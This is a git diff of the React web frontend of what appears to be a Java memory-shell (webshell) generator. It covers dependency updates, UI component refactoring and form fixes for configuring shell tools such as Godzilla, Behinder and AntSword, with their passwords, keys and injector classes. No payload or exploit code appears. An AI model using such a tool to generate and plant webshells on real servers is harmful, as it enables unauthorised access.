"@tanstack/router-devtools": "^1.114.29", + "@tailwindcss/vite": "^4.1.3", + "@tanstack/react-query": "^5.71.10", "class-variance-authority": "^0.7.1", "clsx": "^2.1.1", + "cmdk": "^1.1.1", + "date-fns": "^4.1.0", + "embla-carousel-react": "^8.6.0", "i18next": "^24.2.3", - "lucide-react": "^0.485.0", + "input-otp": "^1.4.2", + "lucide-react": "^0.487.0", "react": "^19.1.0", "react-copy-to-clipboard": "^5.1.0", + "react-day-picker": "9.6.4", "react-dom": "^19.1.0", "react-hook-form": "^7.55.0", "react-i18next": "^15.4.1", + "react-resizable-panels": "^2.1.7", + "react-router": "^7.5.0", + "react-router-dom": "^7.5.0", "react-syntax-highlighter": "^15.6.1", - "sonner": "^2.0.2", - "tailwind-merge": "^3.0.2", + "recharts": "^2.15.2", + "sonner": "^2.0.3", + "tailwind-merge": "^3.1.0", "tailwind-scrollbar": "^4.0.2", "tailwindcss-animate": "^1.0.7", + "vaul": "^1.1.2", "zod": "^3.24.2" }, "trustedDependencies": ["@biomejs/biome"] diff --git a/web/src/components/code-viewer.tsx b/web/src/components/code-viewer.tsx index 572329c9..a9aab28d 100644 --- a/web/src/components/code-viewer.tsx +++ b/web/src/components/code-viewer.tsx @@ -1,4 +1,6 @@ -import { Button, type ButtonProps } from "@/components/ui/button"; +import { Button, buttonVariants } from "@/components/ui/button"; +import { cn } from "@/lib/utils"; +import { VariantProps } from "class-variance-authority"; import { Check, Copy } from "lucide-react"; import { type HTMLProps, type ReactNode, useCallback, useEffect, useState } from "react"; import { CopyToClipboard } from "react-copy-to-clipboard"; @@ -7,12 +9,12 @@ import { Prism as SyntaxHighlighter } from "react-syntax-highlighter"; import { materialDark } from "react-syntax-highlighter/dist/esm/styles/prism"; import { toast } from "sonner"; -interface CopyButtonProps extends ButtonProps { +interface CopyButtonProps extends React.ComponentProps<"button"> { value: string; src?: string; } -export function CopyButton({ value }: Readonly) { +export function CopyButton({ value }: Readonly>) { const [hasCopied, setHasCopied] = useState(false); const { t } = useTranslation(); @@ -50,27 +52,24 @@ export function CopyButton({ value }: Readonly) { export function CodeViewer({ code, header, + button, language, height, showLineNumbers = true, wrapLongLines = true, -}: CodeViewerProps) { +}: Readonly) { const lineProps: lineTagPropsFunction | HTMLProps | undefined = wrapLongLines ? { style: { overflowWrap: "break-word", whiteSpace: "pre-wrap" } } : undefined; return (
- {header && ( -
- {header} +
+ {header} +
+ {button}
- )} - {!header && ( -
- -
- )} +
diff --git a/web/src/components/main-config-card.tsx b/web/src/components/main-config-card.tsx index c5f6d245..166a2129 100644 --- a/web/src/components/main-config-card.tsx +++ b/web/src/components/main-config-card.tsx @@ -19,7 +19,7 @@ import { WaypointsIcon, ZapIcon, } from "lucide-react"; -import { JSX, useState } from "react"; +import { JSX, useEffect, useState } from "react"; import { FormProvider, UseFormReturn } from "react-hook-form"; import { useTranslation } from "react-i18next"; import { AntSwordTabContent } from "./tools/antsword-tab"; @@ -65,20 +65,45 @@ export function MainConfigCard({ const shellTool = form.watch("shellTool"); const { t } = useTranslation(); + // 处理一下默认值 server 不刷新 shellType 的问题 + useEffect(() => { + if (mainConfig) { + const initialServer = form.getValues("server"); + if (initialServer && mainConfig[initialServer]) { + handleServerChange(initialServer); + } + } + }, [mainConfig, form]); + + // 处理一下 shellTypes 由于 server 或 shellTool 变更时无法正常为 form.shellType 赋值的问题 + useEffect(() => { + if (shellTypes.length > 0) { + form.setValue("shellType", shellTypes[0]); + } + }, [shellTypes, form]); + const handleServerChange = (value: string) => { if (mainConfig) { const newShellToolMap = mainConfig[value]; setShellToolMap(newShellToolMap); + const newShellTools = Object.keys(newShellToolMap); setShellTools([...newShellTools.map((tool) => tool as ShellToolType), ShellToolType.Custom]); - if (newShellTools.length > 0) { - const firstTool = newShellTools[0]; - setShellTypes(newShellToolMap[firstTool]); + + const currentShellTool = form.getValues("shellTool"); + + const firstTool = newShellTools[0]; + let currentShellTypes = null; + + if (!newShellToolMap[currentShellTool]) { form.setValue("shellTool", firstTool); + currentShellTypes = newShellToolMap[firstTool]; } else { - setShellTypes([]); + currentShellTypes = newShellToolMap[currentShellTool]; } + setShellTypes(currentShellTypes); + // 特殊环境的 JDK 版本 if ( (value === "SpringWebFlux" || value === "XXLJOB") && Number.parseInt(form.getValues("targetJdkVersion") as string) < 52 @@ -88,8 +113,6 @@ export function MainConfigCard({ form.resetField("targetJdkVersion"); } form.resetField("bypassJavaModule"); - form.resetField("shellTool"); - form.resetField("shellType"); form.resetField("urlPattern"); } }; @@ -133,14 +156,15 @@ export function MainConfigCard({ }; if (shellToolMap) { + let currentShellTypes = null; if (value === ShellToolType.Custom) { - setShellTypes(servers?.[form.getValues("server")] as string[]); + currentShellTypes = servers?.[form.getValues("server")] as string[]; } else { - setShellTypes(shellToolMap[value]); + currentShellTypes = shellToolMap[value]; } + setShellTypes(currentShellTypes); form.resetField("urlPattern"); - form.resetField("shellType"); form.resetField("shellClassName"); form.resetField("injectorClassName"); if (value === ShellToolType.Godzilla) { @@ -177,7 +201,7 @@ export function MainConfigCard({ control={form.control} name="server" render={({ field }) => ( - + {t("mainConfig.server")} )} @@ -38,7 +40,7 @@ export function AntSwordTabContent({ control={form.control} name="headerName" render={({ field }) => ( - + {t("shellToolConfig.headerName")} @@ -48,8 +50,10 @@ export function AntSwordTabContent({ control={form.control} name="headerValue" render={({ field }) => ( - - {t("shellToolConfig.headerValue")} + + + {t("shellToolConfig.headerValue")} {t("optional")} + )} diff --git a/web/src/components/tools/behinder-tab.tsx b/web/src/components/tools/behinder-tab.tsx index 964c0a6d..88fc8fde 100644 --- a/web/src/components/tools/behinder-tab.tsx +++ b/web/src/components/tools/behinder-tab.tsx @@ -27,8 +27,10 @@ export function BehinderTabContent({ control={form.control} name="behinderPass" render={({ field }) => ( - - {t("shellToolConfig.behinderPass")} + + + {t("shellToolConfig.behinderPass")} {t("optional")} + )} @@ -38,7 +40,7 @@ export function BehinderTabContent({ control={form.control} name="headerName" render={({ field }) => ( - + {t("shellToolConfig.headerName")} @@ -48,8 +50,10 @@ export function BehinderTabContent({ control={form.control} name="headerValue" render={({ field }) => ( - - {t("shellToolConfig.headerValue")} + + + {t("shellToolConfig.headerValue")} {t("optional")} + )} diff --git a/web/src/components/tools/classname-field.tsx b/web/src/components/tools/classname-field.tsx index 5f5a2f7d..3ba5cac9 100644 --- a/web/src/components/tools/classname-field.tsx +++ b/web/src/components/tools/classname-field.tsx @@ -12,7 +12,7 @@ export function OptionalClassFormField({ form }: Readonly<{ form: UseFormReturn< control={form.control} name="shellClassName" render={({ field }) => ( - + {t("mainConfig.shellClassName")} {t("optional")} @@ -24,7 +24,7 @@ export function OptionalClassFormField({ form }: Readonly<{ form: UseFormReturn< control={form.control} name="injectorClassName" render={({ field }) => ( - + {t("mainConfig.injectorClassName")} {t("optional")} diff --git a/web/src/components/tools/command-tab.tsx b/web/src/components/tools/command-tab.tsx index 7ba8f2ac..608f5554 100644 --- a/web/src/components/tools/command-tab.tsx +++ b/web/src/components/tools/command-tab.tsx @@ -27,8 +27,10 @@ export function CommandTabContent({ control={form.control} name="commandParamName" render={({ field }) => ( - - {t("shellToolConfig.paramName")} + + + {t("shellToolConfig.paramName")} {t("optional")} + diff --git a/web/src/components/tools/custom-tab.tsx b/web/src/components/tools/custom-tab.tsx index 9c6c076f..df7b4efa 100644 --- a/web/src/components/tools/custom-tab.tsx +++ b/web/src/components/tools/custom-tab.tsx @@ -32,7 +32,7 @@ export default function CustomTabContent({ control={form.control} name="shellClassBase64" render={({ field }) => ( - + {t("shellToolConfig.base64String")} File
- + {isFile ? ( { diff --git a/web/src/components/tools/godzilla-tab.tsx b/web/src/components/tools/godzilla-tab.tsx index 30aa6f5d..b27cb844 100644 --- a/web/src/components/tools/godzilla-tab.tsx +++ b/web/src/components/tools/godzilla-tab.tsx @@ -28,8 +28,10 @@ export function GodzillaTabContent({ control={form.control} name="godzillaPass" render={({ field }) => ( - - {t("shellToolConfig.pass")} + + + {t("shellToolConfig.pass")} {t("optional")} + )} @@ -38,8 +40,10 @@ export function GodzillaTabContent({ control={form.control} name="godzillaKey" render={({ field }) => ( - - {t("shellToolConfig.key")} + + + {t("shellToolConfig.key")} {t("optional")} + )} @@ -48,7 +52,7 @@ export function GodzillaTabContent({ control={form.control} name="headerName" render={({ field }) => ( - + {t("shellToolConfig.headerName")} @@ -58,8 +62,10 @@ export function GodzillaTabContent({ control={form.control} name="headerValue" render={({ field }) => ( - - {t("shellToolConfig.headerValue")} + + + {t("shellToolConfig.headerValue")} {t("optional")} + )} diff --git a/web/src/components/tools/neoreg-tab.tsx b/web/src/components/tools/neoreg-tab.tsx index 61fb1a20..351f68f3 100644 --- a/web/src/components/tools/neoreg-tab.tsx +++ b/web/src/components/tools/neoreg-tab.tsx @@ -28,7 +28,7 @@ export function NeoRegTabContent({ control={form.control} name="headerName" render={({ field }) => ( - + {t("shellToolConfig.headerName")} @@ -38,8 +38,10 @@ export function NeoRegTabContent({ control={form.control} name="headerValue" render={({ field }) => ( - - {t("shellToolConfig.headerValue")} + + + {t("shellToolConfig.headerValue")} {t("optional")} + )} diff --git a/web/src/components/tools/shelltype-field.tsx b/web/src/components/tools/shelltype-field.tsx index 4bd045db..65ce4446 100644 --- a/web/src/components/tools/shelltype-field.tsx +++ b/web/src/components/tools/shelltype-field.tsx @@ -16,7 +16,7 @@ export function ShellTypeFormField({ control={form.control} name="shellType" render={({ field }) => ( - + {t("mainConfig.shellMountType")} @@ -38,8 +38,10 @@ export function Suo5TabContent({ control={form.control} name="headerValue" render={({ field }) => ( - - {t("shellToolConfig.headerValue")} + + + {t("shellToolConfig.headerValue")} {t("optional")} + )} diff --git a/web/src/components/tools/urlpattern-field.tsx b/web/src/components/tools/urlpattern-field.tsx index 5b086e58..23a004a3 100644 --- a/web/src/components/tools/urlpattern-field.tsx +++ b/web/src/components/tools/urlpattern-field.tsx @@ -13,7 +13,7 @@ export function UrlPatternFormField({ form }: Readonly<{ form: UseFormReturn ( - + {t("mainConfig.urlPattern")} diff --git a/web/src/components/ui/alert-dialog.tsx b/web/src/components/ui/alert-dialog.tsx index 6dfbfb49..05f1664b 100644 --- a/web/src/components/ui/alert-dialog.tsx +++ b/web/src/components/ui/alert-dialog.tsx @@ -1,93 +1,102 @@ +"use client"; + import * as React from "react"; import * as AlertDialogPrimitive from "@radix-ui/react-alert-dialog"; import { cn } from "@/lib/utils"; import { buttonVariants } from "@/components/ui/button"; -const AlertDialog = AlertDialogPrimitive.Root; - -const AlertDialogTrigger = AlertDialogPrimitive.Trigger; +function AlertDialog({ ...props }: React.ComponentProps) { + return ; +} -const AlertDialogPortal = AlertDialogPrimitive.Portal; +function AlertDialogTrigger({ ...props }: React.ComponentProps) { + return ; +} -const AlertDialogOverlay = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -AlertDialogOverlay.displayName = AlertDialogPrimitive.Overlay.displayName; +function AlertDialogPortal({ ...props }: React.ComponentProps) { + return ; +} -const AlertDialogContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - - - ) { + return ( + - -)); -AlertDialogContent.displayName = AlertDialogPrimitive.Content.displayName; + ); +} -const AlertDialogHeader = ({ className, ...props }: React.HTMLAttributes) => ( -
-); -AlertDialogHeader.displayName = "AlertDialogHeader"; +function AlertDialogContent({ className, ...props }: React.ComponentProps) { + return ( + + + + + ); +} -const AlertDialogFooter = ({ className, ...props }: React.HTMLAttributes) => ( -
-); -AlertDialogFooter.displayName = "AlertDialogFooter"; +function AlertDialogHeader({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} -const AlertDialogTitle = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -AlertDialogTitle.displayName = AlertDialogPrimitive.Title.displayName; +function AlertDialogFooter({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} -const AlertDialogDescription = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -AlertDialogDescription.displayName = AlertDialogPrimitive.Description.displayName; +function AlertDialogTitle({ className, ...props }: React.ComponentProps) { + return ( + + ); +} + +function AlertDialogDescription({ + className, + ...props +}: React.ComponentProps) { + return ( + + ); +} -const AlertDialogAction = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -AlertDialogAction.displayName = AlertDialogPrimitive.Action.displayName; +function AlertDialogAction({ className, ...props }: React.ComponentProps) { + return ; +} -const AlertDialogCancel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -AlertDialogCancel.displayName = AlertDialogPrimitive.Cancel.displayName; +function AlertDialogCancel({ className, ...props }: React.ComponentProps) { + return ; +} export { AlertDialog, diff --git a/web/src/components/ui/alert.tsx b/web/src/components/ui/alert.tsx index d457ccb7..aadf66c4 100644 --- a/web/src/components/ui/alert.tsx +++ b/web/src/components/ui/alert.tsx @@ -4,12 +4,13 @@ import { cva, type VariantProps } from "class-variance-authority"; import { cn } from "@/lib/utils"; const alertVariants = cva( - "relative w-full rounded-lg border px-4 py-3 text-sm [&>svg+div]:translate-y-[-3px] [&>svg]:absolute [&>svg]:left-4 [&>svg]:top-4 [&>svg]:text-foreground [&>svg~*]:pl-7", + "relative w-full rounded-lg border px-4 py-3 text-sm grid has-[>svg]:grid-cols-[calc(var(--spacing)*4)_1fr] grid-cols-[0_1fr] has-[>svg]:gap-x-3 gap-y-0.5 items-start [&>svg]:size-4 [&>svg]:translate-y-0.5 [&>svg]:text-current", { variants: { variant: { - default: "bg-background text-foreground", - destructive: "border-destructive/50 text-destructive dark:border-destructive [&>svg]:text-destructive", + default: "bg-card text-card-foreground", + destructive: + "text-destructive bg-card [&>svg]:text-current *:data-[slot=alert-description]:text-destructive/90", }, }, defaultVariants: { @@ -18,26 +19,31 @@ const alertVariants = cva( }, ); -const Alert = React.forwardRef< - HTMLDivElement, - React.HTMLAttributes & VariantProps ->(({ className, variant, ...props }, ref) => ( -
-)); -Alert.displayName = "Alert"; +function Alert({ className, variant, ...props }: React.ComponentProps<"div"> & VariantProps) { + return
; +} -const AlertTitle = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -AlertTitle.displayName = "AlertTitle"; +function AlertTitle({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} -const AlertDescription = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -AlertDescription.displayName = "AlertDescription"; +function AlertDescription({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} export { Alert, AlertTitle, AlertDescription }; diff --git a/web/src/components/ui/button.tsx b/web/src/components/ui/button.tsx index ef8b515f..0e17490e 100644 --- a/web/src/components/ui/button.tsx +++ b/web/src/components/ui/button.tsx @@ -5,22 +5,24 @@ import { cva, type VariantProps } from "class-variance-authority"; import { cn } from "@/lib/utils"; const buttonVariants = cva( - "inline-flex items-center justify-center gap-2 whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg]:size-4 [&_svg]:shrink-0", + "inline-flex items-center justify-center gap-2 whitespace-nowrap rounded-md text-sm font-medium transition-all disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg:not([class*='size-'])]:size-4 shrink-0 [&_svg]:shrink-0 outline-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive", { variants: { variant: { - default: "bg-primary text-primary-foreground shadow hover:bg-primary/90", - destructive: "bg-destructive text-destructive-foreground shadow-sm hover:bg-destructive/90", - outline: "border border-input bg-background shadow-sm hover:bg-accent hover:text-accent-foreground", - secondary: "bg-secondary text-secondary-foreground shadow-sm hover:bg-secondary/80", - ghost: "hover:bg-accent hover:text-accent-foreground", + default: "bg-primary text-primary-foreground shadow-xs hover:bg-primary/90", + destructive: + "bg-destructive text-white shadow-xs hover:bg-destructive/90 focus-visible:ring-destructive/20 dark:focus-visible:ring-destructive/40 dark:bg-destructive/60", + outline: + "border bg-background shadow-xs hover:bg-accent hover:text-accent-foreground dark:bg-input/30 dark:border-input dark:hover:bg-input/50", + secondary: "bg-secondary text-secondary-foreground shadow-xs hover:bg-secondary/80", + ghost: "hover:bg-accent hover:text-accent-foreground dark:hover:bg-accent/50", link: "text-primary underline-offset-4 hover:underline", }, size: { - default: "h-9 px-4 py-2", - sm: "h-8 rounded-md px-3 text-xs", - lg: "h-10 rounded-md px-8", - icon: "h-9 w-9", + default: "h-9 px-4 py-2 has-[>svg]:px-3", + sm: "h-8 rounded-md gap-1.5 px-3 has-[>svg]:px-2.5", + lg: "h-10 rounded-md px-6 has-[>svg]:px-4", + icon: "size-9", }, }, defaultVariants: { @@ -30,18 +32,19 @@ const buttonVariants = cva( }, ); -export interface ButtonProps - extends React.ButtonHTMLAttributes, - VariantProps { - asChild?: boolean; -} +function Button({ + className, + variant, + size, + asChild = false, + ...props +}: React.ComponentProps<"button"> & + VariantProps & { + asChild?: boolean; + }) { + const Comp = asChild ? Slot : "button"; -const Button = React.forwardRef( - ({ className, variant, size, asChild = false, ...props }, ref) => { - const Comp = asChild ? Slot : "button"; - return ; - }, -); -Button.displayName = "Button"; + return ; +} export { Button, buttonVariants }; diff --git a/web/src/components/ui/card.tsx b/web/src/components/ui/card.tsx index 82099ea7..a8fc56ae 100644 --- a/web/src/components/ui/card.tsx +++ b/web/src/components/ui/card.tsx @@ -2,42 +2,55 @@ import * as React from "react"; import { cn } from "@/lib/utils"; -const Card = React.forwardRef>(({ className, ...props }, ref) => ( -
-)); -Card.displayName = "Card"; - -const CardHeader = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -CardHeader.displayName = "CardHeader"; - -const CardTitle = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -CardTitle.displayName = "CardTitle"; - -const CardDescription = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -CardDescription.displayName = "CardDescription"; - -const CardContent = React.forwardRef>( - ({ className, ...props }, ref) =>
, -); -CardContent.displayName = "CardContent"; - -const CardFooter = React.forwardRef>( - ({ className, ...props }, ref) => ( -
- ), -); -CardFooter.displayName = "CardFooter"; - -export { Card, CardHeader, CardFooter, CardTitle, CardDescription, CardContent }; +function Card({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} + +function CardHeader({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} + +function CardTitle({ className, ...props }: React.ComponentProps<"div">) { + return
; +} + +function CardDescription({ className, ...props }: React.ComponentProps<"div">) { + return
; +} + +function CardAction({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} + +function CardContent({ className, ...props }: React.ComponentProps<"div">) { + return
; +} + +function CardFooter({ className, ...props }: React.ComponentProps<"div">) { + return ( +
+ ); +} + +export { Card, CardHeader, CardFooter, CardTitle, CardAction, CardDescription, CardContent }; diff --git a/web/src/components/ui/checkbox.tsx b/web/src/components/ui/checkbox.tsx index 5a4cc5a5..af4f2a07 100644 --- a/web/src/components/ui/checkbox.tsx +++ b/web/src/components/ui/checkbox.tsx @@ -1,26 +1,29 @@ +"use client"; + import * as React from "react"; import * as CheckboxPrimitive from "@radix-ui/react-checkbox"; -import { Check } from "lucide-react"; +import { CheckIcon } from "lucide-react"; import { cn } from "@/lib/utils"; -const Checkbox = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - - - - - -)); -Checkbox.displayName = CheckboxPrimitive.Root.displayName; +function Checkbox({ className, ...props }: React.ComponentProps) { + return ( + + + + + + ); +} export { Checkbox }; diff --git a/web/src/components/ui/dropdown-menu.tsx b/web/src/components/ui/dropdown-menu.tsx index 767ced0c..43ea299f 100644 --- a/web/src/components/ui/dropdown-menu.tsx +++ b/web/src/components/ui/dropdown-menu.tsx @@ -1,180 +1,219 @@ +"use client"; + import * as React from "react"; import * as DropdownMenuPrimitive from "@radix-ui/react-dropdown-menu"; -import { Check, ChevronRight, Circle } from "lucide-react"; +import { CheckIcon, ChevronRightIcon, CircleIcon } from "lucide-react"; import { cn } from "@/lib/utils"; -const DropdownMenu = DropdownMenuPrimitive.Root; - -const DropdownMenuTrigger = DropdownMenuPrimitive.Trigger; - -const DropdownMenuGroup = DropdownMenuPrimitive.Group; - -const DropdownMenuPortal = DropdownMenuPrimitive.Portal; - -const DropdownMenuSub = DropdownMenuPrimitive.Sub; - -const DropdownMenuRadioGroup = DropdownMenuPrimitive.RadioGroup; - -const DropdownMenuSubTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef & { - inset?: boolean; - } ->(({ className, inset, children, ...props }, ref) => ( - - {children} - - -)); -DropdownMenuSubTrigger.displayName = DropdownMenuPrimitive.SubTrigger.displayName; - -const DropdownMenuSubContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -DropdownMenuSubContent.displayName = DropdownMenuPrimitive.SubContent.displayName; - -const DropdownMenuContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, sideOffset = 4, ...props }, ref) => ( - - ) { + return ; +} + +function DropdownMenuPortal({ ...props }: React.ComponentProps) { + return ; +} + +function DropdownMenuTrigger({ ...props }: React.ComponentProps) { + return ; +} + +function DropdownMenuContent({ + className, + sideOffset = 4, + ...props +}: React.ComponentProps) { + return ( + + + + ); +} + +function DropdownMenuGroup({ ...props }: React.ComponentProps) { + return ; +} + +function DropdownMenuItem({ + className, + inset, + variant = "default", + ...props +}: React.ComponentProps & { + inset?: boolean; + variant?: "default" | "destructive"; +}) { + return ( + - -)); -DropdownMenuContent.displayName = DropdownMenuPrimitive.Content.displayName; - -const DropdownMenuItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef & { - inset?: boolean; - } ->(({ className, inset, ...props }, ref) => ( - svg]:size-4 [&>svg]:shrink-0", - inset && "pl-8", - className, - )} - {...props} - /> -)); -DropdownMenuItem.displayName = DropdownMenuPrimitive.Item.displayName; - -const DropdownMenuCheckboxItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, checked, ...props }, ref) => ( - - - - - - - {children} - -)); -DropdownMenuCheckboxItem.displayName = DropdownMenuPrimitive.CheckboxItem.displayName; - -const DropdownMenuRadioItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - - - - {children} - -)); -DropdownMenuRadioItem.displayName = DropdownMenuPrimitive.RadioItem.displayName; - -const DropdownMenuLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef & { - inset?: boolean; - } ->(({ className, inset, ...props }, ref) => ( - -)); -DropdownMenuLabel.displayName = DropdownMenuPrimitive.Label.displayName; - -const DropdownMenuSeparator = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)); -DropdownMenuSeparator.displayName = DropdownMenuPrimitive.Separator.displayName; - -const DropdownMenuShortcut = ({ className, ...props }: React.HTMLAttributes) => { - return ; -}; -DropdownMenuShortcut.displayName = "DropdownMenuShortcut"; + ); +} + +function DropdownMenuCheckboxItem({ + className, + children, + checked, + ...props +}: React.ComponentProps) { + return ( + + + + + + + {children} + + ); +} + +function DropdownMenuRadioGroup({ ...props }: React.ComponentProps) { + return ; +} + +function DropdownMenuRadioItem({ + className, + children, + ...props +}: React.ComponentProps) { + return ( + + + + + + + {children} + + ); +} + +function DropdownMenuLabel({ + className, + inset, + ...props +}: React.ComponentProps & { + inset?: boolean; +}) { + return ( + + ); +} + +function DropdownMenuSeparator({ className, ...props }: React.ComponentProps) { + return ( + + ); +} + +function DropdownMenuShortcut({ className, ...props }: React.ComponentProps<"span">) { + return ( + + ); +} + +function DropdownMenuSub({ ...props }: React.ComponentProps) { + return ; +} + +function DropdownMenuSubTrigger({ + className, + inset, + children, + ...props +}: React.ComponentProps & { + inset?: boolean; +}) { + return ( + + {children} + + + ); +} + +function DropdownMenuSubContent({ + className, + ...props +}: React.ComponentProps) { + return ( + + ); +} export { DropdownMenu, + DropdownMenuPortal, DropdownMenuTrigger, DropdownMenuContent, + DropdownMenuGroup, + DropdownMenuLabel, DropdownMenuItem, DropdownMenuCheckboxItem, + DropdownMenuRadioGroup, DropdownMenuRadioItem, - DropdownMenuLabel, DropdownMenuSeparator, DropdownMenuShortcut, - DropdownMenuGroup, - DropdownMenuPortal, DropdownMenuSub, - DropdownMenuSubContent, DropdownMenuSubTrigger, - DropdownMenuRadioGroup, + DropdownMenuSubContent, }; diff --git a/web/src/components/ui/form.tsx b/web/src/components/ui/form.tsx index d2465746..d2f203f4 100644 --- a/web/src/components/ui/form.tsx +++ b/web/src/components/ui/form.tsx @@ -1,7 +1,15 @@ import * as React from "react"; import * as LabelPrimitive from "@radix-ui/react-label"; import { Slot } from "@radix-ui/react-slot"; -import { Controller, ControllerProps, FieldPath, FieldValues, FormProvider, useFormContext } from "react-hook-form"; +import { + Controller, + FormProvider, + useFormContext, + useFormState, + type ControllerProps, + type FieldPath, + type FieldValues, +} from "react-hook-form"; import { cn } from "@/lib/utils"; import { Label } from "@/components/ui/label"; @@ -33,8 +41,8 @@ const FormField = < const useFormField = () => { const fieldContext = React.useContext(FormFieldContext); const itemContext = React.useContext(FormItemContext); - const { getFieldState, formState } = useFormContext(); - + const { getFieldState } = useFormContext(); + const formState = useFormState({ name: fieldContext.name }); const fieldState = getFieldState(fieldContext.name, formState); if (!fieldContext) { @@ -59,78 +67,70 @@ type FormItemContextValue = { const FormItemContext = React.createContext({} as FormItemContextValue); -const FormItem = React.forwardRef>( - ({ className, ...props }, ref) => { - const id = React.useId(); - - return ( - -
- - ); - }, -); -FormItem.displayName = "FormItem"; - -const FormLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => { +function FormItem({ className, ...props }: React.ComponentProps<"div">) { + const id = React.useId(); + + return ( + +
+ + ); +} + +function FormLabel({ className, ...props }: React.ComponentProps) { const { error, formItemId } = useFormField(); - return